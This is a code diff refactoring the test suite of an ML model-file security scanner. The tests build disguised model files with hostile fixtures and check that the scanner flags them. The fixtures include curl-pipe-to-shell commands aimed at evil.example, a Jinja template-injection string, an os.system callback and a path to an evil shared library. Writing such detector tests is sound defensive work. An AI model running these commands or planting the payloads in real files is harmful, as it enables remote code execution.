None: - if scanner_id == "keras_zip" and not keras_scanner_available: - return None - return original_load_scanner(scanner_id) - - monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) + keras_scanner_available = _switch_keras_availability(monkeypatch) reset_cache_manager() try: @@ -10981,7 +10611,7 @@ def load_scanner(scanner_id: str) -> type[Any] | None: assert "keras_zip" in cached.metadata["scanner_dependency_ids"] assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] > 0 - keras_scanner_available = False + keras_scanner_available[0] = False unavailable = scan_file(str(outer_archive), config=config) finally: reset_cache_manager() @@ -11006,12 +10636,7 @@ def test_scan_file_disables_advanced_cache_for_unavailable_keras_fallback( "metadata.json": json.dumps({"keras_version": "3.0.0"}).encode("utf-8"), }, ) - original_load_scanner = core_module._registry._load_scanner - - def load_scanner(scanner_id: str) -> type[Any] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner = without_keras_zip_scanner(core_module._registry._load_scanner) def scan_advanced_without_cache( path: str, @@ -11068,12 +10693,7 @@ def test_scan_file_preserves_generic_findings_when_content_routed_keras_zip_scan "payload.pkl": _build_malicious_pickle(), }, ) - original_load_scanner = core_module._registry._load_scanner - - def load_scanner(scanner_id: str) -> type[Any] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) + load_scanner = without_keras_zip_scanner(core_module._registry._load_scanner) monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) @@ -11097,32 +10717,7 @@ def test_scan_file_unavailable_keras_scanner_restores_whitelist_downgrade( "metadata.json": json.dumps({"keras_version": "3.0.0"}).encode("utf-8"), }, ) - original_load_scanner = core_module._registry._load_scanner - - def load_scanner(scanner_id: str) -> type[Any] | None: - if scanner_id == "keras_zip": - return None - return original_load_scanner(scanner_id) - - def scan_with_whitelisted_finding(self: ZipScanner, path: str) -> ScanResult: - self.context = UnifiedMLContext( - file_path=Path(path), - file_size=Path(path).stat().st_size, - file_type=".keras", - model_id=next(iter(POPULAR_MODELS)), - model_source="huggingface", - ) - result = self._create_result() - result.add_check( - name="Fallback Security Finding", - passed=False, - message="High confidence fallback anomaly", - severity=IssueSeverity.CRITICAL, - rule_code="CUSTOM001", - ) - result.finish(success=True) - assert result.issues[0].severity == IssueSeverity.INFO - return result + load_scanner = without_keras_zip_scanner(core_module._registry._load_scanner) monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) monkeypatch.setattr(ZipScanner, "scan", scan_with_whitelisted_finding) @@ -11778,53 +11373,11 @@ def test_scan_file_reports_visible_jax_pattern_before_oversized_json_exit2(tmp_p def test_scan_file_reports_visible_jax_pattern_after_depth_capped_prefix_value(tmp_path: Path) -> None: - model_path = tmp_path / "depth-capped-prefix-large.checkpoint" - deep_value: object = "benign" - for _ in range(JaxCheckpointScanner._MAX_METADATA_TRAVERSAL_DEPTH + 1): - deep_value = [deep_value] - model_path.write_text( - json.dumps( - { - "framework": "jax", - "deep": deep_value, - "payload": "jax.experimental.io_callback", - "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), - } - ), - encoding="utf-8", - ) - - aggregate = scan_model_directory_or_file(str(model_path), cache_scan_results=False) - - assert core_module.determine_exit_code(aggregate) == 1 - assert any("Suspicious pattern in bounded JSON checkpoint prefix" in issue.message for issue in aggregate.issues) - assert aggregate.file_metadata[str(model_path)]["scan_outcome"] == "inconclusive" - assert "mxnet_symbol_routing_incomplete" in aggregate.file_metadata[str(model_path)]["scan_outcome_reasons"] + _assert_bounded_jax_prefix_coverage(tmp_path, ("depth-capped-prefix-large.checkpoint")) def test_scan_file_reports_visible_renamed_jax_pattern_behind_inconclusive_mxnet_depth_route(tmp_path: Path) -> None: - model_path = tmp_path / "depth-capped-renamed-large.jpg" - deep_value: object = "benign" - for _ in range(JaxCheckpointScanner._MAX_METADATA_TRAVERSAL_DEPTH + 1): - deep_value = [deep_value] - model_path.write_text( - json.dumps( - { - "framework": "jax", - "deep": deep_value, - "payload": "jax.experimental.io_callback", - "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), - } - ), - encoding="utf-8", - ) - - aggregate = scan_model_directory_or_file(str(model_path), cache_scan_results=False) - - assert core_module.determine_exit_code(aggregate) == 1 - assert any("Suspicious pattern in bounded JSON checkpoint prefix" in issue.message for issue in aggregate.issues) - assert aggregate.file_metadata[str(model_path)]["scan_outcome"] == "inconclusive" - assert "mxnet_symbol_routing_incomplete" in aggregate.file_metadata[str(model_path)]["scan_outcome_reasons"] + _assert_bounded_jax_prefix_coverage(tmp_path, ("depth-capped-renamed-large.jpg")) def test_scan_file_reports_escaped_renamed_jax_pattern_behind_inconclusive_mxnet_depth_route(tmp_path: Path) -> None: @@ -12245,33 +11798,11 @@ def test_scan_file_routes_misnamed_executorch_archive_by_content(tmp_path: Path) def test_scan_file_does_not_route_non_pytorch_zip_with_generic_pickle(tmp_path: Path) -> None: - disguised_zip = tmp_path / "weights.jpg" - _create_misnamed_zip( - disguised_zip, - { - "weights.pkl": pickle.dumps({"weights": [1, 2, 3]}), - "version": b"1.0", - }, - ) - - result = scan_file(str(disguised_zip)) - - assert result.scanner_name == "zip" + _assert_generic_zip_pickle_routing(tmp_path, ("weights.jpg"), ("weights.pkl"), (b"1.0")) def test_scan_file_does_not_route_near_match_executorch_zip_without_numeric_version(tmp_path: Path) -> None: - disguised_zip = tmp_path / "bytecode.jpg" - _create_misnamed_zip( - disguised_zip, - { - "bytecode.pkl": pickle.dumps({"weights": [1, 2, 3]}), - "version": b"dev", - }, - ) - - result = scan_file(str(disguised_zip)) - - assert result.scanner_name == "zip" + _assert_generic_zip_pickle_routing(tmp_path, ("bytecode.jpg"), ("bytecode.pkl"), (b"dev")) def test_scan_file_does_not_route_generic_data_pickle_without_pytorch_metadata(tmp_path: Path) -> None: @@ -12653,16 +12184,7 @@ def test_scan_file_generic_json_hint_before_value_budget_resolves_later_mxnet_st def test_scan_file_generic_array_heads_before_value_budget_without_mxnet_structure_uses_existing_owner( tmp_path: Path, ) -> None: - config_path = tmp_path / "config.json" - config_path.write_text( - '{"heads":["classification"],"padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - result = scan_file(str(config_path)) - - assert result.scanner_name == "manifest" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + _assert_generic_json_existing_owner(tmp_path, ('{"heads":["classification"],"padding":[')) def test_scan_file_canonical_mxnet_symbol_preserves_xgboost_overlap_analysis(tmp_path: Path) -> None: @@ -12913,11 +12435,7 @@ def test_scan_file_routes_xgboost_json_with_markers_after_mxnet_probe_budget( encoding="utf-8", ) - result = scan_file(str(model_path), config={"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) - assert any("Suspicious pattern detected: System call in JSON" in issue.message for issue in result.issues) + _assert_xgboost_json_pattern(model_path) def test_scan_file_fails_closed_for_xgboost_mxnet_json_overlap( @@ -12968,11 +12486,7 @@ def test_scan_file_xgboost_owned_params_preserves_raw_signature_findings(tmp_pat b'"metadata":"\x7fELF"}' ) - result = scan_file(str(model_path), config={"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert "xgboost_mxnet_symbol_overlap" in result.metadata["scan_outcome_reasons"] - assert any("Potential executable signature found in params blob" in issue.message for issue in result.issues) + _assert_xgboost_params_signature(model_path) def test_scan_file_xgboost_owned_shadowed_params_preserves_raw_signature_findings(tmp_path: Path) -> None: @@ -12983,11 +12497,7 @@ def test_scan_file_xgboost_owned_shadowed_params_preserves_raw_signature_finding b'"metadata":"\x7fELF","nodes":[]}' ) - result = scan_file(str(model_path), config={"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert "xgboost_mxnet_symbol_overlap" in result.metadata["scan_outcome_reasons"] - assert any("Potential executable signature found in params blob" in issue.message for issue in result.issues) + _assert_xgboost_params_signature(model_path) def test_scan_file_xgboost_owned_analysis_failed_params_preserves_raw_signature_findings(tmp_path: Path) -> None: @@ -13210,11 +12720,7 @@ def test_scan_file_runs_xgboost_checks_for_bounded_probable_malformed_mxnet_over encoding="utf-8", ) - result = scan_file(str(model_path), config={"cache_enabled": False}) - - assert result.scanner_name == "xgboost" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) - assert any("Suspicious pattern detected: System call in JSON" in issue.message for issue in result.issues) + _assert_xgboost_json_pattern(model_path) def test_scan_file_keeps_benign_mxnet_json_near_match_out_of_xgboost_routing(tmp_path: Path) -> None: @@ -13697,37 +13203,22 @@ def test_scan_file_whitespace_prefixed_generic_json_without_mxnet_hint_fails_clo def test_scan_file_scalar_heads_generic_json_uses_existing_owner(tmp_path: Path) -> None: - config_path = tmp_path / "config.json" - config_path.write_text( - '{"heads":"main","padding":[' + ",".join("0" for _ in range(5000)) + "]}", - encoding="utf-8", - ) - - result = scan_file(str(config_path)) - - assert result.scanner_name == "manifest" - assert "mxnet_symbol_routing_incomplete" not in result.metadata.get("scan_outcome_reasons", []) + _assert_generic_json_existing_owner(tmp_path, ('{"heads":"main","padding":[')) def test_scan_file_fails_closed_for_large_generic_json_with_truncated_duplicate_mxnet_nodes( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - config_path = tmp_path / "config.json" - config_path.write_text( - '{"heads":[[0,0,0]],"nodes":[],"padding":"' - + ("x" * 256) - + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0]}', - encoding="utf-8", + _assert_truncated_mxnet_routing( + tmp_path, + monkeypatch, + ("config.json"), + ('{"heads":[[0,0,0]],"nodes":[],"padding":"'), + (256), + ('","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],"arg_nodes":[0]}'), ) - result = scan_file(str(config_path)) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) - @pytest.mark.parametrize("initial_nodes", ["[]", "null"]) def test_scan_file_fails_closed_for_early_duplicate_mxnet_nodes_without_other_hints( @@ -13757,78 +13248,58 @@ def test_scan_file_fails_closed_for_generic_json_with_padded_node_object( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - config_path = tmp_path / "metadata.json" - config_path.write_text( - '{"nodes":[{"attrs":"' - + ("x" * 129) - + '","op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0],"heads":[[0,0,0]]}', - encoding="utf-8", + _assert_truncated_mxnet_routing( + tmp_path, + monkeypatch, + ("metadata.json"), + ('{"nodes":[{"attrs":"'), + (129), + ( + '","op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' + '"arg_nodes":[0],"heads":[[0,0,0]]}' + ), ) - result = scan_file(str(config_path)) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) - def test_scan_file_oversized_generic_json_with_lone_array_heads_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - config_path = tmp_path / "config.json" - config_path.write_text( - '{"heads":["classification"],"padding":"' + ("x" * 256) + '"}', - encoding="utf-8", + _assert_truncated_mxnet_routing( + tmp_path, monkeypatch, ("config.json"), ('{"heads":["classification"],"padding":"'), (256), ('"}') ) - result = scan_file(str(config_path)) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) - def test_scan_file_oversized_generic_json_with_mxnet_heads_shape_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - config_path = tmp_path / "config.json" - config_path.write_text( - '{"heads":[[0,0,0]],"padding":"' - + ("x" * 256) - + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0]}', - encoding="utf-8", + _assert_truncated_mxnet_routing( + tmp_path, + monkeypatch, + ("config.json"), + ('{"heads":[[0,0,0]],"padding":"'), + (256), + ('","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],"arg_nodes":[0]}'), ) - result = scan_file(str(config_path)) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) - def test_scan_file_oversized_generic_json_with_hidden_mxnet_graph_fails_closed( tmp_path: Path, monkeypatch: pytest.MonkeyPatch, ) -> None: - monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) - config_path = tmp_path / "config.json" - config_path.write_text( - '{"padding":"' - + ("x" * 256) - + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' - '"arg_nodes":[0],"heads":[[0,0,0]]}', - encoding="utf-8", + _assert_truncated_mxnet_routing( + tmp_path, + monkeypatch, + ("config.json"), + ('{"padding":"'), + (256), + ( + '","nodes":[{"op":"Custom","name":"load","attrs":{"library":"../../tmp/libevil.so"}}],' + '"arg_nodes":[0],"heads":[[0,0,0]]}' + ), ) - result = scan_file(str(config_path)) - - assert result.success is False - assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) - def test_scan_file_inconclusive_mxnet_config_preserves_jinja_analysis( tmp_path: Path, @@ -14927,27 +14398,16 @@ def test_scan_file_tokenizer_json_library_jax_identity_composes_jinja_template_a def test_scan_file_tokenizer_json_jax_identity_composes_jinja_template_analysis(tmp_path: Path) -> None: - tokenizer_path = _write_ordered_hf_tokenizer_json( - tmp_path / "tokenizer.json", - late_fields=( + _assert_tokenizer_jax_template_composition( + tmp_path, + ("tokenizer.json"), + ( ',"framework":"jax",' '"payload":"jax.experimental.host_callback.call(os.system, \'id\')",' '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"' ), ) - result = scan_file(str(tokenizer_path), config={"cache_scan_results": False}) - - assert result.scanner_name == "jinja2_template" - assert set(result.metadata["scanner_dependency_ids"]) >= {"jinja2_template", "jax_checkpoint"} - assert any( - check.name == "JSON Pattern Security Check" and check.status == CheckStatus.FAILED for check in result.checks - ) - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) - def test_scan_file_tokenizer_json_escaped_long_jax_identity_value_composes_jinja_template_analysis( tmp_path: Path, @@ -14985,50 +14445,28 @@ def test_scan_file_tokenizer_json_escaped_long_jax_identity_value_composes_jinja def test_scan_file_extensionless_tokenizer_jax_identity_composes_jinja_template_analysis(tmp_path: Path) -> None: - tokenizer_path = _write_ordered_hf_tokenizer_json( - tmp_path / "tokenizer", - late_fields=( + _assert_tokenizer_jax_template_composition( + tmp_path, + ("tokenizer"), + ( ',"framework":"jax",' '"payload":"jax.experimental.host_callback.call(os.system, \'id\')",' '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"' ), ) - result = scan_file(str(tokenizer_path), config={"cache_scan_results": False}) - - assert result.scanner_name == "jinja2_template" - assert set(result.metadata["scanner_dependency_ids"]) >= {"jinja2_template", "jax_checkpoint"} - assert any( - check.name == "JSON Pattern Security Check" and check.status == CheckStatus.FAILED for check in result.checks - ) - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) - def test_scan_file_tokenizer_json_jax_library_identity_composes_jinja_template_analysis(tmp_path: Path) -> None: - tokenizer_path = _write_ordered_hf_tokenizer_json( - tmp_path / "tokenizer.json", - late_fields=( + _assert_tokenizer_jax_template_composition( + tmp_path, + ("tokenizer.json"), + ( ',"library":"jax",' '"payload":"jax.experimental.host_callback.call(os.system, \'id\')",' '"chat_template":"{{ \'\'.__class__.__mro__[1].__subclasses__() }}"' ), ) - result = scan_file(str(tokenizer_path), config={"cache_scan_results": False}) - - assert result.scanner_name == "jinja2_template" - assert set(result.metadata["scanner_dependency_ids"]) >= {"jinja2_template", "jax_checkpoint"} - assert any( - check.name == "JSON Pattern Security Check" and check.status == CheckStatus.FAILED for check in result.checks - ) - assert any( - check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) - def test_scan_file_tokenizer_config_template_jax_identity_composes_jax_analysis(tmp_path: Path) -> None: tokenizer_path = tmp_path / "tokenizer_config.json" @@ -15621,33 +15059,11 @@ def test_scan_file_detects_malicious_extensionless_llamafile(tmp_path: Path) -> def test_scan_file_detects_malicious_llamafile_with_misleading_suffix(tmp_path: Path) -> None: - disguised_llamafile = tmp_path / "payload.jpg" - disguised_llamafile.write_bytes( - b"\x7fELF" - + b"\x02\x01\x01\x00" - + b"\x00" * 56 - + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" - ) - - result = scan_file(str(disguised_llamafile)) - - assert result.scanner_name == "llamafile" - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + _assert_misnamed_llamafile_detection(tmp_path, ("payload.jpg")) def test_scan_file_detects_malicious_llamafile_with_onnx_suffix(tmp_path: Path) -> None: - disguised_llamafile = tmp_path / "payload.onnx" - disguised_llamafile.write_bytes( - b"\x7fELF" - + b"\x02\x01\x01\x00" - + b"\x00" * 56 - + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" - ) - - result = scan_file(str(disguised_llamafile)) - - assert result.scanner_name == "llamafile" - assert any(issue.severity == IssueSeverity.CRITICAL for issue in result.issues) + _assert_misnamed_llamafile_detection(tmp_path, ("payload.onnx")) def test_scan_file_benign_llamafile_with_onnx_suffix_reports_format_mismatch(tmp_path: Path) -> None: @@ -15901,37 +15317,11 @@ def test_scan_file_keeps_s901_for_external_data_pt_onnx(tmp_path: Path) -> None: def test_scan_file_keeps_s901_for_malicious_valid_pt_onnx(tmp_path: Path) -> None: - pytest.importorskip("onnx") - disguised_onnx = _create_budgeted_onnx_candidate(tmp_path / "malicious.pt", op_type="PythonOp") - - result = scan_file(str(disguised_onnx), config={"cache_enabled": False}) - format_check = _format_validation_check(result) - - assert result.scanner_name == "onnx" - assert format_check.severity == IssueSeverity.WARNING - assert format_check.rule_code == "S901" - assert _actionable_s901_issues(result) - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("op_type") == "PythonOp" - for issue in result.issues - ) + _assert_malicious_misnamed_onnx_format_issue(tmp_path, ("malicious.pt")) def test_scan_file_keeps_s901_for_malicious_valid_pth_onnx(tmp_path: Path) -> None: - pytest.importorskip("onnx") - disguised_onnx = _create_budgeted_onnx_candidate(tmp_path / "malicious.pth", op_type="PythonOp") - - result = scan_file(str(disguised_onnx), config={"cache_enabled": False}) - format_check = _format_validation_check(result) - - assert result.scanner_name == "onnx" - assert format_check.severity == IssueSeverity.WARNING - assert format_check.rule_code == "S901" - assert _actionable_s901_issues(result) - assert any( - issue.severity == IssueSeverity.CRITICAL and issue.details.get("op_type") == "PythonOp" - for issue in result.issues - ) + _assert_malicious_misnamed_onnx_format_issue(tmp_path, ("malicious.pth")) def test_scan_file_keeps_s901_when_malicious_pt_onnx_finding_is_suppressed(tmp_path: Path) -> None: @@ -16303,20 +15693,7 @@ def test_scan_file_detects_malicious_onnx_pb_by_content(tmp_path: Path) -> None: @pytest.mark.parametrize("prefix", [b"", b"\x9a\x06\x03pad", b"\x9b\x06\x08\x01\x9c\x06"]) def test_scan_file_routes_misnamed_coreml_and_detects_custom_layer(tmp_path: Path, prefix: bytes) -> None: - disguised_coreml = create_mock_coreml( - tmp_path / "malicious.jpg", - custom_class="EvilRuntimeLayer", - custom_parameter=("postprocess_script", "bash -c 'curl https://evil.example/p.sh | sh'"), - ) - disguised_coreml.write_bytes(prefix + disguised_coreml.read_bytes()) - - result = scan_file(str(disguised_coreml), config={"cache_scan_results": False}) - - assert result.scanner_name == "coreml" - assert any( - issue.severity == IssueSeverity.CRITICAL and "Custom CoreML layer detected" in issue.message - for issue in result.issues - ) + _assert_misnamed_coreml_custom_layer(tmp_path, prefix, ("malicious.jpg")) @pytest.mark.parametrize( @@ -16328,20 +15705,7 @@ def test_scan_file_routes_misnamed_coreml_and_detects_custom_layer(tmp_path: Pat ids=["top-level-field-budget", "unknown-group-budget"], ) def test_scan_file_detects_malicious_budget_exhausted_renamed_coreml(tmp_path: Path, prefix: bytes) -> None: - disguised_coreml = create_mock_coreml( - tmp_path / "budgeted.jpg", - custom_class="EvilRuntimeLayer", - custom_parameter=("postprocess_script", "bash -c 'curl https://evil.example/p.sh | sh'"), - ) - disguised_coreml.write_bytes(prefix + disguised_coreml.read_bytes()) - - result = scan_file(str(disguised_coreml), config={"cache_scan_results": False}) - - assert result.scanner_name == "coreml" - assert any( - issue.severity == IssueSeverity.CRITICAL and "Custom CoreML layer detected" in issue.message - for issue in result.issues - ) + _assert_misnamed_coreml_custom_layer(tmp_path, prefix, ("budgeted.jpg")) def test_scan_file_detects_malicious_prefixed_renamed_onnx_by_content(tmp_path: Path) -> None: @@ -16550,31 +15914,11 @@ def test_scan_file_detects_malicious_renamed_tf_function_metagraph_by_content(tm def test_scan_file_detects_malicious_renamed_tf_savedmodel_by_content(tmp_path: Path) -> None: - disguised_savedmodel = tmp_path / "saved.jpg" - disguised_savedmodel.write_bytes(_build_malicious_tf_savedmodel()) - - result = scan_file(str(disguised_savedmodel), config={"cache_scan_results": False}) - - assert result.scanner_name == "tf_savedmodel" - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL and "PyFunc operation detected" in issue.message - for issue in result.issues - ) + _assert_misnamed_tf_savedmodel_detection(tmp_path, ("saved.jpg")) def test_scan_file_detects_malicious_tf_savedmodel_renamed_with_meta_suffix(tmp_path: Path) -> None: - disguised_savedmodel = tmp_path / "saved.meta" - disguised_savedmodel.write_bytes(_build_malicious_tf_savedmodel()) - - result = scan_file(str(disguised_savedmodel), config={"cache_scan_results": False}) - - assert result.scanner_name == "tf_savedmodel" - assert result.success is False - assert any( - issue.severity == IssueSeverity.CRITICAL and "PyFunc operation detected" in issue.message - for issue in result.issues - ) + _assert_misnamed_tf_savedmodel_detection(tmp_path, ("saved.meta")) def test_scan_file_inspects_renamed_tf_savedmodel_collection_payloads(tmp_path: Path) -> None: @@ -18279,3 +17623,342 @@ def test_scan_file_xgboost_generation_config_runs_selected_jinja_when_manifest_e check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED for check in result.checks ) + + +def _record_directory_owner_scans(monkeypatch: pytest.MonkeyPatch, scanner_class: type[BaseScanner]) -> list[Path]: + owner_calls: list[Path] = [] + original_scan = scanner_class.scan + + def record_savedmodel_scan(scanner: BaseScanner, path: str) -> ScanResult: + if Path(path).is_dir(): + owner_calls.append(Path(path).resolve()) + return original_scan(scanner, path) + + monkeypatch.setattr(scanner_class, "scan", record_savedmodel_scan) + return owner_calls + + +def _record_shard_scans( + monkeypatch: pytest.MonkeyPatch, blob_paths: list[Path] +) -> tuple[list[dict[str, Any]], list[str]]: + captured_configs: list[dict[str, Any]] = [] + return captured_configs, _record_shard_calls(monkeypatch, blob_paths, captured_configs) + + +def _switch_keras_availability(monkeypatch: pytest.MonkeyPatch) -> list[bool]: + original_load_scanner = core_module._registry._load_scanner + keras_scanner_available = [True] + + def load_scanner(scanner_id: str) -> type[Any] | None: + if scanner_id == "keras_zip" and not keras_scanner_available[0]: + return None + return original_load_scanner(scanner_id) + + monkeypatch.setattr(core_module._registry, "_load_scanner", load_scanner) + return keras_scanner_available + + +def _assert_flax_overlap_routed(tmp_path: Path, suffix: str) -> None: + if not flax_msgpack_scanner.HAS_MSGPACK: + pytest.skip("msgpack unavailable") + + checkpoint = tmp_path / f"malicious{suffix}" + checkpoint.write_bytes( + flax_msgpack_scanner.msgpack.packb({"params": {"w": [1, 2, 3]}, "__reduce__": "os.system"}, use_bin_type=True) + ) + + result = scan_file(str(checkpoint), config={"cache_scan_results": False}) + + assert result.scanner_name == "flax_msgpack" + assert result.success is False + assert any(issue.message == "Suspicious object attribute detected: __reduce__" for issue in result.issues) + + +def _assert_truncated_mxnet_routing( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, + case_filename: str, + case_prefix: str, + case_padding_length: int, + case_suffix: str, +) -> None: + monkeypatch.setattr(file_detection, "MXNET_SYMBOL_SIGNATURE_READ_BYTES", 128) + config_path = tmp_path / case_filename + config_path.write_text( + case_prefix + ("x" * case_padding_length) + case_suffix, + encoding="utf-8", + ) + + result = scan_file(str(config_path)) + + assert result.success is False + assert "mxnet_symbol_routing_incomplete" in result.metadata.get("scan_outcome_reasons", []) + + +def _assert_tokenizer_jax_template_composition(tmp_path: Path, case_filename: str, case_late_fields: str) -> None: + tokenizer_path = _write_ordered_hf_tokenizer_json( + tmp_path / case_filename, + late_fields=(case_late_fields), + ) + + result = scan_file(str(tokenizer_path), config={"cache_scan_results": False}) + + assert result.scanner_name == "jinja2_template" + assert set(result.metadata["scanner_dependency_ids"]) >= {"jinja2_template", "jax_checkpoint"} + assert any( + check.name == "JSON Pattern Security Check" and check.status == CheckStatus.FAILED for check in result.checks + ) + assert any( + check.name == "Jinja2 Template Injection Detection" and check.status == CheckStatus.FAILED + for check in result.checks + ) + + +def _assert_safetensors_pickle_stack_routing(tmp_path: Path, case_pickle_tail: bytes, case_filename: str) -> None: + pickle_tail = case_pickle_tail + polyglot = tmp_path / case_filename + _write_safetensors_pickle_tail(polyglot, ord("V"), pickle_tail) + + assert file_detection.detect_file_format(str(polyglot)) == "pickle" + assert file_detection.detect_file_format_from_magic(str(polyglot)) == "pickle" + assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "pickle" + + result = scan_file(str(polyglot), config={"cache_enabled": False}) + + assert result.scanner_name == "pickle" + _assert_system_pickle_issue(result) + + +def _assert_late_pickle_stop_in_msgpack( + tmp_path: Path, case_filename: str, case_pickle_prefix: bytes, case_pickle_suffix: bytes +) -> None: + if not flax_msgpack_scanner.HAS_MSGPACK: + pytest.skip("msgpack unavailable") + + checkpoint = tmp_path / case_filename + pickle_stream = ( + case_pickle_prefix + (b"N0" * (file_detection.PROTO0_1_MAX_PROBE_BYTES // 2 + 1)) + case_pickle_suffix + ) + checkpoint.write_bytes( + pickle_stream + + flax_msgpack_scanner.msgpack.packb( + {"params": {"w": [1, 2, 3]}}, + use_bin_type=True, + ) + ) + + result = scan_file(str(checkpoint), config={"cache_scan_results": False}) + + assert result.scanner_name == "flax_msgpack" + assert any( + issue.rule_code == "S201" and any(global_name in issue.message.lower() for global_name in _SYSTEM_GLOBAL_NAMES) + for issue in result.issues + ) + + +def _assert_bounded_jax_prefix_coverage(tmp_path: Path, case_filename: str) -> None: + model_path = tmp_path / case_filename + deep_value: object = "benign" + for _ in range(JaxCheckpointScanner._MAX_METADATA_TRAVERSAL_DEPTH + 1): + deep_value = [deep_value] + model_path.write_text( + json.dumps( + { + "framework": "jax", + "deep": deep_value, + "payload": "jax.experimental.io_callback", + "padding": "x" * (JAX_JSON_CHECKPOINT_STRUCTURE_READ_BYTES + 16), + } + ), + encoding="utf-8", + ) + + aggregate = scan_model_directory_or_file(str(model_path), cache_scan_results=False) + + assert core_module.determine_exit_code(aggregate) == 1 + assert any("Suspicious pattern in bounded JSON checkpoint prefix" in issue.message for issue in aggregate.issues) + assert aggregate.file_metadata[str(model_path)]["scan_outcome"] == "inconclusive" + assert "mxnet_symbol_routing_incomplete" in aggregate.file_metadata[str(model_path)]["scan_outcome_reasons"] + + +def _assert_generic_zip_schema_near_match(tmp_path: Path, case_filename: str, case_member_name: str) -> None: + disguised_zip = tmp_path / case_filename + _create_misnamed_zip( + disguised_zip, + { + case_member_name: json.dumps( + { + "__class__": "Pipeline", + "__module__": "sklearn.pipeline", + "__loader__": "ObjectNode", + "content": {}, + } + ).encode("utf-8"), + }, + ) + + result = scan_file(str(disguised_zip)) + + assert result.scanner_name == "zip" + assert not any("CVE-2025-" in check.name for check in result.checks) + + +def _assert_malicious_misnamed_onnx_format_issue(tmp_path: Path, case_filename: str) -> None: + pytest.importorskip("onnx") + disguised_onnx = _create_budgeted_onnx_candidate(tmp_path / case_filename, op_type="PythonOp") + + result = scan_file(str(disguised_onnx), config={"cache_enabled": False}) + format_check = _format_validation_check(result) + + assert result.scanner_name == "onnx" + assert format_check.severity == IssueSeverity.WARNING + assert format_check.rule_code == "S901" + assert _actionable_s901_issues(result) + assert any( + issue.severity == IssueSeverity.CRITICAL and issue.details.get("op_type") == "PythonOp" + for issue in result.issues + ) + + +def _assert_misnamed_coreml_custom_layer(tmp_path: Path, prefix: bytes, case_filename: str) -> None: + disguised_coreml = create_mock_coreml( + tmp_path / case_filename, + custom_class="EvilRuntimeLayer", + custom_parameter=("postprocess_script", "bash -c 'curl https://evil.example/p.sh | sh'"), + ) + disguised_coreml.write_bytes(prefix + disguised_coreml.read_bytes()) + + result = scan_file(str(disguised_coreml), config={"cache_scan_results": False}) + + assert result.scanner_name == "coreml" + assert any( + issue.severity == IssueSeverity.CRITICAL and "Custom CoreML layer detected" in issue.message + for issue in result.issues + ) + + +def _assert_empty_stack_global_collision_clean(tmp_path: Path, case_filename: str, case_pickle_tail: bytes) -> None: + polyglot = tmp_path / case_filename + _write_safetensors_pickle_tail(polyglot, ord("V"), case_pickle_tail) + + assert file_detection.detect_file_format(str(polyglot)) == "safetensors" + assert file_detection.detect_file_format_from_magic(str(polyglot)) == "safetensors" + assert file_detection.detect_file_format_for_skip_filter(str(polyglot)) == "safetensors" 